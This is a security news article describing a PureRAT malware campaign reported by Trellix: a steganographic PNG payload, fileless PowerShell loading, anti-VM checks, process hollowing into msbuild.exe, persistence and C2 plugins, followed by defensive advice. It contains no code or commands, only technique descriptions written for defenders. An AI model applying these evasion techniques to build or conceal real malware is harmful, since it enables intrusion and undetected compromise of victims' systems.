A new and sophisticated malware campaign employing the PureRAT remote access trojan (RAT) has been identified, targeting Windows systems with a novel approach to stealth. This campaign is notable for its ability to conceal malicious Portable Executable (PE) payloads within seemingly innocuous PNG image files, executing them entirely in memory through a technique known as fileless execution. This advanced evasion method makes it exceptionally difficult for traditional signature-based security solutions to detect and block the threat.
Researchers at Trellix brought this PureRAT campaign to light, detailing a multi-stage infection chain designed for maximum stealth. The attack commences with a malicious .lnk shortcut file, a common Windows file type that can be easily disguised to appear legitimate. Upon opening the shortcut, a silent PowerShell command is initiated, which then contacts a remote server to retrieve a PNG image. This image, however, is not what it appears; it contains a Base64-encoded PE file embedded using steganography, allowing it to hide in plain sight.
PureRAT Campaign Employs Fileless Execution via PNG Payloads
The PureRAT campaign leverages image steganography and fileless execution to achieve a high degree of stealth. The initial infection vector, a malicious .lnk file, triggers a hidden PowerShell script. This script downloads a PNG image containing a malicious PE payload. The script meticulously extracts this payload from the image, decodes it from Base64, and loads it directly into the system’s memory without writing any discernible files to disk. This fileless execution is a critical component of PureRAT’s evade-detection strategy.
According to Trellix’s analysis, the PowerShell-based second-stage loader is heavily obfuscated. Threat actors have incorporated junk data at both the beginning and end of the script to thwart analysis by security researchers and automated tools. Furthermore, the malware actively checks for the presence of virtualization environments like VMware and QEMU. If detected, it initiates a self-termination process, further complicating sandbox analysis. This avoidance of virtualized analysis environments signifies a more determined and sophisticated threat actor.
Once fully deployed, PureRAT performs comprehensive host fingerprinting, collecting vital information about the compromised system. This includes details on installed security software, hardware identifiers, and the privilege levels associated with the logged-in user. The malware executes malicious code using process hollowing, injecting it into the legitimate and signed msbuild.exe Windows binary. This technique allows the malicious payload to run under the guise of a trusted system process, significantly increasing its chances of remaining undetected.
Persistence on the infected system is maintained through a Windows Registry-based scheduled task, ensuring that PureRAT can re-execute automatically upon system reboots. Command and control (C2) communication is established with a dynamic listener, enabling the operators to dispatch various plugins. These plugins can facilitate keylogging, system monitoring, and remote desktop access, effectively giving attackers full control over the compromised machine.
The Advanced Infection Mechanism of PureRAT
The intricate infection mechanism of PureRAT relies on a sophisticated combination of image steganography and in-memory payload delivery. Following the execution of the initial .lnk file, the concealed PowerShell command downloads a PNG image from an attacker-controlled server. This image holds a Base64-encoded PE file, hidden within its visual data. The PowerShell script is designed to locate the precise start and end indices of this embedded payload.
After extraction, the script performs a character replacement operation and reverses the data before decoding it from Base64. This processed data is then converted into a byte array. Crucially, this byte array is loaded directly into the PowerShell process’s memory as a compiled .NET assembly, utilizing the .NET Framework’s `System.Reflection.Assembly.Load()` method. This entire process ensures that the original msbuild.exe binary on disk remains untouched and retains its legitimate, signed status, thereby evading file-scanning detection mechanisms.
The actual .NET DLL, embedded within a file often named or related to `GeneratedPy.png`, acts as the subsequent stage loader. This loader is protected by .NET Reactor obfuscation. Its primary function involves invoking a Triple DES decryption routine. The decryption key and initialization vector required for this process are derived from Base64-encoded strings embedded within the file itself. Following decryption, these bytes are executed as a .NET assembly directly in memory, completing a fully fileless malware delivery chain.
To mitigate the risk posed by advanced threats like PureRAT, organizations are advised to implement robust security practices. This includes hardening endpoint security by enforcing strict execution policies for PowerShell and VBScript, and configuring security software to detect in-memory activities such as process hollowing and reflective code loading. Additionally, monitoring and restricting the use of critical built-in Windows binaries like `cmstp.exe` and `msbuild.exe` is essential, as these are frequently abused components in sophisticated attack chains. Regular application of security patches and comprehensive user training on recognizing suspicious files and attachments are also paramount defenses against such evolving malware campaigns.